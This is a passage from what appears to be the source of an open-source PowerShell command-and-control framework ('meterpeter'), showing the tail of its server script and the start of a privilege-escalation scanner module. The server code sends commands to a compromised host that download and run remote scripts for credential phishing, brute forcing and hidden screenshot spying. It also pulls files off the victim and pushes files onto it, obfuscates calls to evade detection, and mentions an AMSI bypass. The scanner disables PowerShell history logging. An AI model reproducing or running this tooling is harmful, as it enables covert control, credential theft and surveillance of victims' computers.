\"`$Env:USERNAME\"}\r\n\r\n            Write-Host \"\"\r\n            #Build output DataTable!\r\n            $BruteTime = Get-Date -Format \"HH:mm:ss\"\r\n            $BruteTable = New-Object System.Data.DataTable\r\n            $BruteTable.Columns.Add(\"UserName\")|Out-Null\r\n            $BruteTable.Columns.Add(\"StartTime\")|Out-Null\r\n            $BruteTable.Columns.Add(\"Dicionary\")|Out-Null\r\n\r\n            #Adding values to output DataTable!\r\n            $BruteTable.Rows.Add(\"$UserAccountName\",\"$BruteTime\",\"%TMP%\\passw.txt\")|Out-Null\r\n\r\n            #Diplay output DataTable!\r\n            $BruteTable | 
Format-Table -AutoSize | Out-String -Stream | ForEach-Object {\r\n               $stringformat = If($_ -Match '^(UserName)')\r\n               {\r\n                  @{ 'ForegroundColor' = 'Green' }\r\n               }\r\n               Else\r\n               {\r\n                  @{}\r\n               }\r\n               Write-Host @stringformat $_\r\n            }\r\n\r\n            #Run command\r\n            $Command = \"iwr -Uri `\"https://raw.githubusercontent.com/r00t-3xp10it/redpill/main/modules/CredsPhish.ps1`\" -OutFile `\"`$Env:TMP\\CredsPhish.ps1`\";powershell -W 1 -File `$Env:TMP\\CredsPhish.ps1 -PhishCreds Brute -Dicionary `$Env:TMP\\passw.txt -UserAccount $UserAccountName;Remove-Item -Path `$Env:TMP\\CredsPhish.ps1 -Force\"\r\n         }\r\n         If($Brute_choise -ieq \"Return\" -or $Brute_choise -ieq \"cls\" -or $Brute_choise -ieq \"modules\" -or $Brute_choise -ieq \"clear\")\r\n         {\r\n            $choise = $Null;\r\n            $Command = $Null;\r\n            $Brute_choise = $Null;\r\n         }\r\n      }\r\n      If($choise -ieq \"Return\" -or $choice -ieq \"return\" -or $choise -ieq \"cls\" -or $choise -ieq \"Modules\" -or $choise -ieq \"modules\" -or $choise -ieq \"clear\")\r\n      {\r\n        $choise = $Null;\r\n        $Command = $Null;\r\n      }\r\n      $choise = $Null;\r\n      $set_time = $Null;\r\n      $mace_path = $Null;\r\n    }\r\n\r\n    If($Command -ieq \"Download\")\r\n    {\r\n        write-host \"`n`n   Remark:\" -ForegroundColor Yellow;\r\n        write-host \"   Allways input absoluct path of the file to be downloaded.\";\r\n        write-host \"   Avoid downloading LARGE\\HUGE files with tcp connections.\" -ForegroundColor Yellow;\r\n        write-host \"   The file will be stored in meterpeter C2 working directory.\" -ForegroundColor Yellow;\r\n        write-host \"`n`n   Modules   Description                     Privileges Required\" -ForegroundColor green;\r\n        write-host \"   -------   -----------     
                ------------------\";\r\n        write-host \"   Start     Download from rhost to lhost    UserLand\";\r\n        write-host \"   Return    Return to Server Main Menu\" -ForeGroundColor yellow;\r\n        write-host \"`n`n :meterpeter:Download> \" -NoNewline -ForeGroundColor Green;\r\n        $Download_choise = Read-Host;\r\n        If($Download_choise -ieq \"Start\")\r\n        {\r\n           Write-Host \" - Remote File Path: \" -ForeGroundColor Red -NoNewline;\r\n           $File = Read-Host;\r\n\r\n           If(!(\"$File\" -like \"* *\") -and !([string]::IsNullOrEmpty($File)))\r\n           {\r\n              $Command = \"`$1=`\"#`\";If(!(`\"`$1`\" -like `\"*\\*`\") -and !(`\"`$1`\" -like `\"*/*`\")){`$1=`\"`$pwd\\`$1`\"};If(([System.IO.File]::Exists(`\"`$1`\"))){[io.file]::ReadAllBytes(`\"`$1`\") -join ','}\";\r\n              $Command = ChkDskInternalFuncio(Char_Obf($Command));\r\n              $Command = $Command -replace \"#\",\"$File\";\r\n              $File = $File.Split('\\')[-1];\r\n              $File = $File.Split('/')[-1];\r\n              $File = \"$IPATH$File\";\r\n              $Save = $True;\r\n           } Else {\r\n              Write-Host \"`n\";\r\n              $File = $Null;\r\n              $Command = $Null;\r\n           }\r\n      }\r\n      If($Download_choise -ieq \"Return\" -or $Download_choise -ieq \"cls\" -or $Download_choise -ieq \"Modules\" -or $Download_choise -ieq \"clear\")\r\n      {\r\n         $Command = $Null;\r\n         $Download_choise = $Null;\r\n      }\r\n    }\r\n\r\n    If($Command -ieq \"Upload\")\r\n    {\r\n        write-host \"`n`n   Remark:\" -ForegroundColor Yellow;\r\n        write-host \"   Allways input absoluct path of the file to be uploaded.\";\r\n        write-host \"   Avoid uploading LARGE\\HUGE files with tcp connections.\" -ForegroundColor Yellow;\r\n        write-host \"   The file will be uploaded to Client working directory.\" -ForegroundColor Yellow;\r\n        write-host 
\"`n`n   Modules   Description                     Privileges Required\" -ForegroundColor green;\r\n        write-host \"   -------   -----------                     ------------------\";\r\n        write-host \"   Start     Upload from lhost to rhost      UserLand\";\r\n        write-host \"   Return    Return to Server Main Menu\" -ForeGroundColor yellow;\r\n        write-host \"`n`n :meterpeter:Upload> \" -NoNewline -ForeGroundColor Green;\r\n        $Upload_choise = Read-Host;\r\n        If($Upload_choise -ieq \"Start\")\r\n        {\r\n           Write-Host \" - Local File Path: \" -ForeGroundColor Red -NoNewline;\r\n           $File = Read-Host;\r\n\r\n           If(!(\"$File\" -like \"* *\") -and !([string]::IsNullOrEmpty($File)))\r\n           {\r\n\r\n              If(!(\"$File\" -like \"*\\*\") -and !(\"$File\" -like \"*/*\"))\r\n              {\r\n                 $File = \"$IPATH$File\";\r\n              }\r\n\r\n              If(([System.IO.File]::Exists(\"$File\")))\r\n              {\r\n                 $FileBytes = [io.file]::ReadAllBytes(\"$File\") -join ',';\r\n                 $FileBytes = \"($FileBytes)\";\r\n                 $File = $File.Split('\\')[-1];\r\n                 $File = $File.Split('/')[-1];\r\n                 $Command = \"`$1=`\"`$pwd\\#`\";`$2=@;If(!([System.IO.File]::Exists(`\"`$1`\"))){[System.IO.File]::WriteAllBytes(`\"`$1`\",`$2);`\"`$1`\"}\";\r\n                 $Command = ChkDskInternalFuncio(Char_Obf($Command));\r\n                 $Command = $Command -replace \"#\",\"$File\";\r\n                 $Command = $Command -replace \"@\",\"$FileBytes\";\r\n                 $Upload = $True;\r\n              } Else {\r\n                 Write-Host \"`n`n   Status   File Path\" -ForeGroundColor green;\r\n                 Write-Host \"   ------   ---------\";\r\n                 Write-Host \"   Failed   File Missing: $File`n\" -ForeGroundColor red;\r\n                 $Command = $Null;\r\n              }\r\n           } Else {\r\n   
           Write-Host \"`n\";\r\n              $Command = $Null;\r\n           }\r\n           $File = $Null;\r\n      }\r\n        If($Upload_choise -ieq \"Return\" -or $Upload_choise -ieq \"cls\" -or $Upload_choise -ieq \"Modules\" -or $Upload_choise -ieq \"clear\")\r\n        {\r\n           $Command = $Null;\r\n           $Upload_choise = $Null;\r\n        }\r\n    }\r\n\r\n    If($Command -ieq \"Screenshot\")\r\n    {\r\n        write-host \"`n`n   Description:\" -ForegroundColor Yellow;\r\n        write-host \"   This module can be used to take desktop screenshot(s)\";\r\n        write-host \"   Remark: Snapshot auto-downloads the screenshots from 'RHOST'\" -ForegroundColor Yellow;\r\n        write-host \"   Remark: SpyScreen captures in background and stores on %TMP%\" -ForegroundColor Yellow;\r\n        write-host \"`n`n   Modules     Description                     Privileges Required\" -ForegroundColor green;\r\n        write-host \"   -------     -----------                     ------------------\";\r\n        write-host \"   Snapshot    Capture one desktop_screenshot  UserLand\";\r\n        write-host \"   SpyScreen   Capture multiple screenshots    UserLand\";\r\n        write-host \"   Return      Return to Server Main Menu\" -ForeGroundColor yellow;\r\n        write-host \"`n`n :meterpeter:Screenshots> \" -NoNewline -ForeGroundColor Green;\r\n        $choise_two = Read-Host;\r\n        If($choise_two -ieq \"Snapshot\")\r\n        {\r\n           $Obf = \"Ad\" + \"d-Ty\" + \"pe -Ass\" + \"embl\" + \"yName\" -join ''\r\n           $File = -join ((65..90) + (97..122) | Get-Random -Count 8 | % {[char]$_})\r\n           Write-Host \" * Screenshot File:'\" -ForegroundColor Green -NoNewline\r\n           Write-Host \"$File.png\" -ForegroundColor DarkGray -NoNewline\r\n           Write-Host \"'\" -ForegroundColor Green\r\n           write-host \"   => Remark: wait for module to finish..\" -ForegroundColor Red\r\n           \r\n           $Command = 
\"`$FilePath=`\"`$Env:TMP\\#`\";$Obf System.Windows.Forms;`$Microsof=New-Object System.Drawing.Bitmap([System.Windows.Forms.Screen]::PrimaryScreen.Bounds.Width,[System.Windows.Forms.Screen]::PrimaryScreen.Bounds.Height);`$Catrapilar=[System.Drawing.Graphics]::FromImage(`$Microsof);`$Catrapilar.CopyFromScreen((New-Object System.Drawing.Point(0,0)),(New-Object System.Drawing.Point(0,0)),`$Microsof.Size);`$Catrapilar.Dispose();Start-Sleep -Milliseconds 200;`$Microsof.Save(`\"`$FilePath`\");If(([System.IO.File]::Exists(`\"`$FilePath`\"))){[io.file]::ReadAllBytes(`\"`$FilePath`\") -join ',';Remove-Item -Path `\"`$FilePath`\" -Force}\";\r\n           $Command = $Command -replace \"#\",\"$File\";\r\n           $File = \"$pwd\\$File.png\";\r\n           $Save = $True;        \r\n        }\r\n        If($choise_two -ieq \"SpyScreen\")\r\n        {\r\n           [int]$Inbetween = 1\r\n           Write-Host \" - Take how many captures: \" -NoNewline;\r\n           [int]$Captures = Read-Host;\r\n           \r\n           If(-not($Captures) -or $Captures -lt 1)\r\n           {\r\n              [int]$Captures = 1\r\n           }\r\n           ElseIf($Captures -gt 1)\r\n           {\r\n              Write-Host \" - Time between captures : \" -NoNewline;\r\n              [int]$Inbetween = Read-Host;\r\n           }\r\n\r\n           If($Captures -gt 3 -or $Inbetween -gt 5)\r\n           {\r\n              $TotalSpyTime = $Captures * $Inbetween\r\n              write-host \" *\" -ForegroundColor Green -NoNewline;\r\n              write-host \" Background Screenshot Execution.`n`n\" -ForegroundColor Green;\r\n\r\n              ## Create Data Table for output\r\n              $mytable = New-Object System.Data.DataTable\r\n              $mytable.Columns.Add(\"Captures\")|Out-Null\r\n              $mytable.Columns.Add(\"DelayTime\")|Out-Null\r\n              $mytable.Columns.Add(\"TotalTime\")|Out-Null\r\n              $mytable.Columns.Add(\"FileStorage\")|Out-Null\r\n              
$mytable.Rows.Add(\"$Captures\",\r\n                                \"$Inbetween (sec)\",\r\n                                \"$TotalSpyTime (sec)\",\r\n                                \"%tmp%\\Meterpeter.zip\")|Out-Null\r\n\r\n              ## Display Data Table\r\n              $mytable | Format-Table -AutoSize\r\n              $Command = \"iwr -Uri https://raw.githubusercontent.com/r00t-3xp10it/redpill/main/bin/Screenshot.ps1 -OutFile `$Env:TMP\\Screenshot.ps1|Unblock-File;Start-Process -WindowStyle hidden powershell -ArgumentList `\"-File $Env:TMP\\Screenshot.ps1 -Screenshot $Captures -Delay $Inbetween`\"\"           \r\n           }\r\n           Else\r\n           {\r\n              #Run command\r\n              $Command = \"iwr -Uri https://raw.githubusercontent.com/r00t-3xp10it/redpill/main/bin/Screenshot.ps1 -OutFile `$Env:TMP\\Screenshot.ps1|Out-Null;powershell -File `\"`$Env:TMP\\Screenshot.ps1`\" -Screenshot $Captures -Delay $Inbetween\"\r\n           }\r\n        }\r\n        If($choise_two -ieq \"Return\" -or $choise_two -ieq \"cls\" -or $choise_two -ieq \"Modules\" -or $choise_two -ieq \"clear\")\r\n        {\r\n           $Command = $Null;\r\n           $choise_two = $Null;\r\n        }\r\n    }\r\n\r\n\r\n    If(!([string]::IsNullOrEmpty($Command)))\r\n    {\r\n      If(!($Command.length % $Bytes.count))\r\n      {\r\n        $Command += \" \";\r\n      }\r\n\r\n      $SendByte = ([text.encoding]::ASCII).GetBytes($Command);\r\n\r\n      Try {\r\n\r\n        $Stream.Write($SendByte,0,$SendByte.length);\r\n        $Stream.Flush();\r\n      }\r\n\r\n      Catch {\r\n\r\n        Write-Host \"`n [x] Connection Lost with $Remote_Host !\" -ForegroundColor Red -BackGroundColor white;\r\n        $webroot = Test-Path -Path \"$env:LocalAppData\\webroot\\\";If($webroot -ieq $True){cmd /R rmdir /Q /S \"%LocalAppData%\\webroot\\\"};\r\n        Start-Sleep -Seconds 4;\r\n        $Socket.Stop();\r\n        $Client.Close();\r\n        $Stream.Dispose();\r\n        
Exit;\r\n      }\r\n      $WaitData = $True;\r\n    }\r\n\r\n    If($Command -ieq \"Exit\")\r\n    {\r\n      write-Host \"`n\";\r\n      Write-Host \"[x] Closing Connection with $Remote_Host!\" -ForegroundColor Red -BackGroundColor white;\r\n      $check = Test-Path -Path \"$env:LocalAppData\\webroot\\\";\r\n      If($check -ieq $True)\r\n      {\r\n        Start-Sleep -Seconds 2;\r\n        write-host \"[i] Deleted: '$env:LocalAppData\\webroot\\'\" -ForegroundColor Yellow;\r\n        cmd /R rmdir /Q /S \"%LocalAppData%\\webroot\\\";\r\n      }\r\n\r\n      If(Test-Path -Path \"${IPATH}${payload_name}.ps1\" -EA SilentlyContinue)\r\n      {\r\n         Remove-Item -Path \"${IPATH}${payload_name}.ps1\" -ErrorAction SilentlyContinue -Force\r\n         write-host \"[i] Deleted: '${IPATH}${payload_name}.ps1'\" -ForegroundColor Yellow\r\n      }\r\n\r\n      Start-Sleep -Seconds 3\r\n\r\n      Clear-Host\r\n      write-host $EndBanner\r\n      write-host \"      * GitHub: https://github.com/r00t-3xp10it/meterpeter *`n\" -ForegroundColor DarkYellow\r\n\r\n      $Socket.Stop();\r\n      $Client.Close();\r\n      $Stream.Dispose();\r\n      Exit;\r\n    }\r\n\r\n    If($Command -ieq \"Clear\" -or $Command -ieq \"Cls\" -or $Command -ieq \"Clear-Host\" -or $Command -ieq \"return\" -or $Command -ieq \"modules\")\r\n    {\r\n      Clear-Host;\r\n      #Write-Host \"`n$Modules\";\r\n    }\r\n    $Command = $Null;\r\n  }\r\n\r\n  If($WaitData)\r\n  {\r\n    While(!($Stream.DataAvailable))\r\n    {\r\n      Start-Sleep -Milliseconds 1;\r\n    }\r\n\r\n    If($Stream.DataAvailable)\r\n    {\r\n      While($Stream.DataAvailable -or $Read -eq $Bytes.count)\r\n      {\r\n        Try {\r\n\r\n          If(!($Stream.DataAvailable))\r\n          {\r\n            $Temp = 0;\r\n\r\n            While(!($Stream.DataAvailable) -and $Temp -lt 1000)\r\n            {\r\n              Start-Sleep -Milliseconds 1;\r\n              $Temp++;\r\n            }\r\n\r\n            
If(!($Stream.DataAvailable))\r\n            {\r\n              Write-Host \"`n [x] Connection Lost with $Remote_Host!\" -ForegroundColor Red -BackGroundColor white;\r\n              $webroot = Test-Path -Path \"$env:LocalAppData\\webroot\\\";If($webroot -ieq $True){cmd /R rmdir /Q /S \"%LocalAppData%\\webroot\\\"};\r\n              Start-Sleep -Seconds 5;\r\n              $Socket.Stop();\r\n              $Client.Close();\r\n              $Stream.Dispose();\r\n              Exit;\r\n            }\r\n          }\r\n\r\n          $Read = $Stream.Read($Bytes,0,$Bytes.length);\r\n          $OutPut += (New-Object -TypeName System.Text.ASCIIEncoding).GetString($Bytes,0,$Read);\r\n        }\r\n\r\n        Catch {\r\n\r\n          Write-Host \"`n [x] Connection Lost with $Remote_Host!\" -ForegroundColor Red -BackGroundColor white;\r\n          $webroot = Test-Path -Path \"$env:LocalAppData\\webroot\\\";If($webroot -ieq $True){cmd /R rmdir /Q /S \"%LocalAppData%\\webroot\\\"};\r\n          Start-Sleep -Seconds 5;\r\n          $Socket.Stop();\r\n          $Client.Close();\r\n          $Stream.Dispose();\r\n          Exit;\r\n        }\r\n      }\r\n\r\n      If(!($Info))\r\n      {\r\n        $Info = \"$OutPut\";\r\n      }\r\n\r\n      If($OutPut -ne \" \" -and !($Save) -and !($Upload))\r\n      {\r\n        Write-Host \"`n$OutPut\";\r\n      }\r\n\r\n      If($Save)\r\n      {\r\n        If($OutPut -ne \" \")\r\n        {\r\n          If(!([System.IO.File]::Exists(\"$File\")))\r\n          {\r\n            $FileBytes = \"$OutPut\"|&('Sex' -replace 'S','I')\r\n            [System.IO.File]::WriteAllBytes(\"$File\",$FileBytes);\r\n            Write-Host \"`n`n   Status   File Path\" -ForeGroundColor green;\r\n            Write-Host \"   ------   ---------\";\r\n            Write-Host \"   saved    $File`n\";\r\n            $Command = $Null;\r\n          } Else {\r\n            Write-Host \"`n`n   Status   File Path\" -ForeGroundColor green;\r\n            Write-Host \"   
------   ---------\";\r\n            Write-Host \"   Failed   $File (Already Exists)`n\" -ForegroundColor Red;\r\n            $Command = $Null;\r\n          }\r\n        } Else {\r\n          Write-Host \"`n`n   Status   File Path\" -ForeGroundColor green;\r\n          Write-Host \"   ------   ---------\";\r\n          Write-Host \"   Failed   File Missing`n\" -ForegroundColor Red;\r\n          $Command = $Null;\r\n        }\r\n        $File = $Null;\r\n        $Save = $False;\r\n        $Command = $Null; \r\n      }\r\n\r\n      If($Upload)\r\n      {\r\n        If($OutPut -ne \" \")\r\n        {\r\n          If($Cam_set -ieq \"True\")\r\n          {\r\n            write-host \"`n`n    CommandCam syntax\" -ForeGroundColor Green;\r\n            write-host \"    -----------------\";\r\n            Write-Host \"  :meterpeter> .\\CommandCam.exe /devlist`n\";\r\n            $Cam_set = \"False\";\r\n\r\n          }ElseIf($SluiEOP -ieq \"True\"){\r\n          \r\n            cd mimiRatz\r\n            ## Revert SluiEOP [<MakeItPersistence>] to defalt [<False>]\r\n            $CheckValue = Get-Content SluiEOP.ps1|Select-String \"MakeItPersistence =\"\r\n            If($CheckValue -match 'True'){((Get-Content -Path SluiEOP.ps1 -Raw) -Replace \"MakeItPersistence = `\"True`\"\",\"MakeItPersistence = `\"False`\"\")|Set-Content -Path SluiEOP.ps1 -Force}\r\n            cd ..\r\n\r\n            Write-Host \"`n`n   Status   Remote Path\" -ForeGroundColor green;\r\n            write-host \"   ------   -----------\"\r\n            Write-Host \"   Saved    $OutPut`n\"\r\n            $SluiEOP = \"False\"\r\n\r\n         }ElseIf($COMEOP -ieq \"True\"){\r\n\r\n            cd mimiRatz\r\n            ## Revert CompDefault [<MakeItPersistence>] to defalt [<False>]\r\n            $CheckValue = Get-Content CompDefault.ps1|Select-String \"MakeItPersistence =\"\r\n            If($CheckValue -match 'True'){((Get-Content -Path CompDefault.ps1 -Raw) -Replace \"MakeItPersistence = 
`\"True`\"\",\"MakeItPersistence = `\"False`\"\")|Set-Content -Path CompDefault.ps1 -Force}\r\n            cd ..\r\n\r\n            Write-Host \"`n`n   Status   Remote Path\" -ForeGroundColor green;\r\n            write-host \"   ------   -----------\"\r\n            Write-Host \"   Saved    $OutPut`n\"\r\n            $COMEOP = \"False\"\r\n\r\n          }else{\r\n            $OutPut = $OutPut -replace \"`n\",\"\";\r\n            If($OutPut -match \"GetBrowsers.ps1\"){\r\n                $sanitize = $OutPut -replace 'GetBrowsers.ps1','GetBrowsers.ps1 '\r\n                $OutPut = $sanitize.split(' ')[0] # Get only the 1º upload path\r\n            }\r\n            Write-Host \"`n`n   Status   Remote Path\" -ForeGroundColor green;\r\n            Write-Host \"   ------   -----------\";\r\n            Write-Host \"   saved    $OutPut`n\";\r\n          }\r\n          If($Tripflop -ieq \"True\")\r\n          {\r\n            Write-Host \"   execute  :meterpeter> Get-Help ./GetBrowsers.ps1 -full`n\" -ForeGroundColor Yellow;\r\n            $Tripflop = \"False\";\r\n          }\r\n          If($Flipflop -ieq \"True\")\r\n          {\r\n            write-host \"   Remark   Client:Admin triggers 'ams`istream-ByP`ass(PSv2)'`n\" -ForeGroundColor yellow;Start-Sleep -Seconds 1;\r\n            $Flipflop = \"False\";\r\n          }\r\n          If($Camflop  -ieq \"True\")\r\n          {\r\n            write-host \"`n`n    CommandCam syntax\" -ForeGroundColor Green;\r\n            write-host \"    -----------------\";\r\n            Write-Host \"  :meterpeter> .\\CommandCam.exe`n\";\r\n            $Camflop = \"False\";\r\n          }\r\n          If($Phishing  -ieq \"True\")\r\n          {\r\n            $OutPut = $OutPut -replace \".ps1\",\".log\";\r\n            write-host \"   output   $OutPut`n\";\r\n            $Phishing = \"False\";\r\n          }\r\n          If($NewPhishing  -ieq \"True\")\r\n          {\r\n            $OutPut = $OutPut -replace 
\"NewPhish.ps1\",\"CredsPhish.log\";\r\n            write-host \"   output   $OutPut`n\";\r\n            $NewPhishing = \"False\";\r\n          }\r\n          $Command = $Null;\r\n        } Else {\r\n          Write-Host \"`n`n   Status   File Path\" -ForeGroundColor green;\r\n          Write-Host \"   ------   ---------\";\r\n          Write-Host \"   Failed   $File (Already Exists Remote)`n\" -ForeGroundColor red;\r\n          $Command = $Null;\r\n        }\r\n        $Upload = $False;\r\n      }\r\n    $WaitData = $False;\r\n    $Read = $Null;\r\n    $OutPut = $Null;\r\n  }\r\n }\r\n}"
  },
  {
    "path": "mimiRatz/ACLMitreT1574.ps1",
    "content": "﻿<#\r\n.SYNOPSIS\r\n   MITRE ATT&CK - T1574\r\n\r\n   Author: @r00t-3xp10it\r\n   Tested Under: Windows 10 (19043) x64 bits\r\n   Required Dependencies: Get-Acl {native}\r\n   Optional Dependencies: none\r\n   PS cmdlet Dev version: v2.5.11\r\n\r\n.DESCRIPTION\r\n   Cmdlet to search for weak directory permissions (F) (M) (W) that\r\n   allow attackers to Escalate Privileges on target system [ local ]\r\n\r\n.NOTES\r\n   This cmdlet its a auxiliary module of @Meterpeter C2 v2.10.11 release.\r\n   If invoked -action 'path' then cmdlet scans all environement paths for\r\n   FileSystemRigths 'FullControl, Modify' with 'Everyone,Users,UserName'\r\n\r\n   If invoked -action 'dir' then cmdlet scans recursive $Env:PROGRAMFILES\r\n   ${Env:PROGRAMFILES(x86)},$Env:LOCALAPPDATA\\Programs default directrorys\r\n   for FileSystemRigths 'FullControl,Modify' with GroupName 'Everyone,Users'\r\n\r\n   If invoked -extraperm 'true' @argument then cmdlet adds extra\r\n   permission to the 'ACL_Permissions_List' (permisssion: Write)\r\n   Remark: extraperm parameter takes a long time to finish if invoked\r\n   together with -action 'dir' @arg (Scan recursive pre-defined paths)\r\n\r\n   If invoked -extraGroup 'true' @argument then cmdlet adds extra Group\r\n   Name to the 'Groups_To_Scan_List' (NT AUTHORITY\\Authenticated Users)\r\n\r\n   Remark: Parameter -scan 'string' only works if invoked together\r\n   with -action 'dir' @argument ( Scan recursive pre-defined paths ) and\r\n   it will scan recursive the inputed directory ( excluding pre-defined )\r\n\r\n.Parameter Action\r\n   Accepts arguments: dir, path, reg (default: dir)\r\n\r\n.Parameter extraperm\r\n   Add extra permission to permissions_list? (default: false)\r\n\r\n.Parameter scan\r\n   The directory absoluct path to scan recursive (default: false)\r\n\r\n.Parameter extraGroup\r\n   Add extra group name to groups_to_scan_list? 
(default: false)\r\n\r\n.Parameter Verb\r\n   Display the paths beeing scanned in realtime? (default: false)\r\n\r\n.Parameter Logfile\r\n   Create report logfile on %tmp% directory? (default: false)\r\n  \r\n.EXAMPLE\r\n   PS C:\\> .\\ACLMitreT1574.ps1\r\n   Scan recursive in pre-defined directorys for 'Everyone,\r\n   BUILTIN\\Users' GroupNames with 'FullControl,Modify' ACL\r\n\r\n.EXAMPLE\r\n   PS C:\\> .\\ACLMitreT1574.ps1 -action path\r\n   Scans all environement paths for 'Everyone,BUILTIN\\Users,\r\n   DOMAIN\\UserName' GroupNames with 'FullControl,Modify' ACL\r\n\r\n.EXAMPLE\r\n   PS C:\\> .\\ACLMitreT1574.ps1 -action path -logfile true\r\n   Scans all environement paths for 'Everyone,BUILTIN\\Users,\r\n   DOMAIN\\UserName' GroupNames with 'FullControl,Modify' ACL\r\n   and create report logfile on %tmp% directory ..\r\n\r\n.EXAMPLE\r\n   PS C:\\> .\\ACLMitreT1574.ps1 -action dir -extraperm true\r\n   Scan recursive in pre-defined directorys for 'Everyone,\r\n   BUILTIN\\Users' GroupNames with 'FullControl,Modify,Write'\r\n\r\n.EXAMPLE\r\n   PS C:\\> .\\ACLMitreT1574.ps1 -action dir -scan \"C:\\Users\\pedro\\Coding\"\r\n   Scan recursive -scan 'C:\\Users\\pedro\\Coding' for 'Everyone, BUILTIN\\Users'\r\n   GroupNames with 'FullControl,Modify' ACL permissions settings.\r\n\r\n.INPUTS\r\n   None. 
You cannot pipe objects into ACLMitreT1574.ps1\r\n\r\n.OUTPUTS\r\n   VulnId            : 1::ACL (Mitre T1574)\r\n   FolderPath        : C:\\Program Files (x86)\\Resource Hacker\r\n   FileSystemRights  : FullControl\r\n   IdentityReference : Everyone\r\n   IsInherited       : False\r\n\r\n   VulnId            : 2::ACL (Mitre T1574)\r\n   FolderPath        : C:\\Program Files (x86)\\Resource Hacker\\help\r\n   FileSystemRights  : FullControl\r\n   IdentityReference : Everyone\r\n   IsInherited       : True\r\n\r\n   VulnId            : 3::ACL (Mitre T1574)\r\n   FolderPath        : C:\\Program Files (x86)\\Resource Hacker\\samples\r\n   FileSystemRights  : FullControl\r\n   IdentityReference : Everyone\r\n   IsInherited       : True\r\n\r\n   VulnId            : 4::ACL (Mitre T1574)\r\n   FolderPath        : C:\\Program Files (x86)\\Starcraft2\\OobehgtrDoncFjp\r\n   FileSystemRights  : Modify\r\n   IdentityReference : SKYNET\\pedro\r\n   IsInherited       : False\r\n\r\n   VulnId            : 5::ACL (Mitre T1574)\r\n   FolderPath        : C:\\Program Files (x86)\\Starcraft2\\OobehgtrDoncFjp\\games\r\n   FileSystemRights  : Write\r\n   IdentityReference : BUILTIN\\Users\r\n   IsInherited       : True\r\n   \r\n.LINK\r\n   https://attack.mitre.org/techniques/T1574/010\r\n   https://github.com/r00t-3xp10it/meterpeter/blob/master/mimiRatz/FindEop.bat\r\n   https://github.com/r00t-3xp10it/meterpeter/blob/master/mimiRatz/ACLMitreT1574.ps1\r\n#>\r\n\r\n\r\n [CmdletBinding(PositionalBinding=$false)] param(\r\n   [string]$extraGroup=\"false\",\r\n   [string]$extraperm=\"false\",\r\n   [string]$logfile=\"false\",\r\n   [string]$Action=\"dir\",\r\n   [string]$Scan=\"false\",\r\n   [string]$Egg=\"false\",\r\n   [string]$Verb=\"false\"\r\n)\r\n\r\n\r\n$Count = 0 #VulnId Counter\r\n$ScanStartTimer = (Get-Date)\r\n$CmdletVersion = \"v2.5.11\" #CmdLet version\r\n#Disable Powershell Command Logging for current session.\r\nSet-PSReadlineOption –HistorySaveStyle 
SaveNothing|Out-Null\r\n$host.UI.RawUI.WindowTitle = \"@ACLMitreT1574 $CmdletVersion {SSA@RedTeam}\"\r\n$Rand = -join (((48..57)+(65..90)+(97..122)) * 80 |Get-Random -Count 6 |%{[char]$_})\r\nIf($Egg -ieq \"false\")\r\n{\r\n   Write-Host \"* Searching for weak directory permissions ..`n\" -ForegroundColor Green\r\n}\r\n\r\n#Define the GroupName based on the language pack installed!\r\n$LanguageSetting = ([CultureInfo]::InstalledUICulture).Name\r\nIf($LanguageSetting -iMatch '^(pt-PT)$')\r\n{\r\n      $UserGroup = \"Todos\"                                     #Default scan\r\n      $UtilGroup = \"BUILTIN\\\\Utilizadores\"                     #Default scan\r\n      $GroupFdx = \"$Env:USERDOMAIN\\\\$Env:USERNAME\"             #Default scan     - Only available with -action 'path'\r\n      $OneMorek = \"NT AUTHORITY\\\\Utilizadores Autenticados\"    #extra Group Name - Only available with -extragroup 'true'\r\n}\r\nElseIf($LanguageSetting -iMatch '^(fr-FR)$')\r\n{\r\n      $UserGroup = \"Tout\"                                      #Default scan\r\n      $UtilGroup = \"BUILTIN\\\\Utilisateurs\"                     #Default scan\r\n      $GroupFdx = \"$Env:USERDOMAIN\\\\$Env:USERNAME\"             #Default scan     - Only available with -action 'path'\r\n      $OneMorek = \"NT AUTHORITY\\\\Utilisateurs authentifiés\"    #extra Group Name - Only available with -extragroup 'true'\r\n\r\n}\r\nElseIf($LanguageSetting -iMatch '^(pl)')\r\n{\r\n      $UserGroup = \"Wszystkie\"                                 #Default scan\r\n      $UtilGroup = \"BUILTIN\\\\użytkownicy\"                      #Default scan\r\n      $GroupFdx = \"$Env:USERDOMAIN\\\\$Env:USERNAME\"             #Default scan     - Only available with -action 'path'\r\n      $OneMorek = \"NT AUTHORITY\\\\Uwierzytelnieni użytkownicy\"  #extra Group Name - Only available with -extragroup 'true'\r\n\r\n}\r\nElseIf($LanguageSetting -iMatch '^(in)')\r\n{\r\n      #My Wife Language pack!\r\n      $UserGroup = \"Semua\"     
                                #Default scan\r\n      $UtilGroup = \"BUILTIN\\\\Pengguna\"                         #Default scan\r\n      $GroupFdx = \"$Env:USERDOMAIN\\\\$Env:USERNAME\"             #Default scan     - Only available with -action 'path'\r\n      $OneMorek = \"NT AUTHORITY\\\\Pengguna yang Diautentikasi\"  #extra Group Name - Only available with -extragroup 'true'\r\n\r\n}\r\nElseIf($LanguageSetting -iMatch '^(ro)')\r\n{\r\n      $UserGroup = \"Toate\"                                     #Default scan\r\n      $UtilGroup = \"BUILTIN\\\\utilizatorii\"                     #Default scan\r\n      $GroupFdx = \"$Env:USERDOMAIN\\\\$Env:USERNAME\"             #Default scan     - Only available with -action 'path'\r\n      $OneMorek = \"NT AUTHORITY\\\\Utilizatori autentificați\"    #extra Group Name - Only available with -extragroup 'true'\r\n\r\n}\r\nElse\r\n{\r\n      $UserGroup = \"Everyone\"                                  #Default scan\r\n      $UtilGroup = \"BUILTIN\\\\Users\"                            #Default scan\r\n      $GroupFdx = \"$Env:USERDOMAIN\\\\$Env:USERNAME\"             #Default scan     - Only available with -action 'path'\r\n      $OneMorek = \"NT AUTHORITY\\\\Authenticated Users\"          #extra Group Name - Only available with -extragroup 'true'\r\n}\r\nIf($logfile -ieq \"True\")\r\n{\r\n   #Create logfile on %tmp% directory if sellected by user.\r\n   echo \"Logfile created by ACLMitre1574\" > $Env:TMP\\Mitre1574-$Rand.log\r\n   echo \"Scan Start: $ScanStartTimer\" >> $Env:TMP\\Mitre1574-$Rand.log\r\n   echo \"------------------------------------------\" >> $Env:TMP\\Mitre1574-$Rand.log\r\n}\r\n\r\n\r\nIf($Action -ieq \"path\")\r\n{\r\n\r\n   <#\r\n   .SYNOPSIS\r\n      Author: @r00t-3xp10it\r\n      Helper - Search in environement paths for dirs with weak permissions!\r\n\r\n   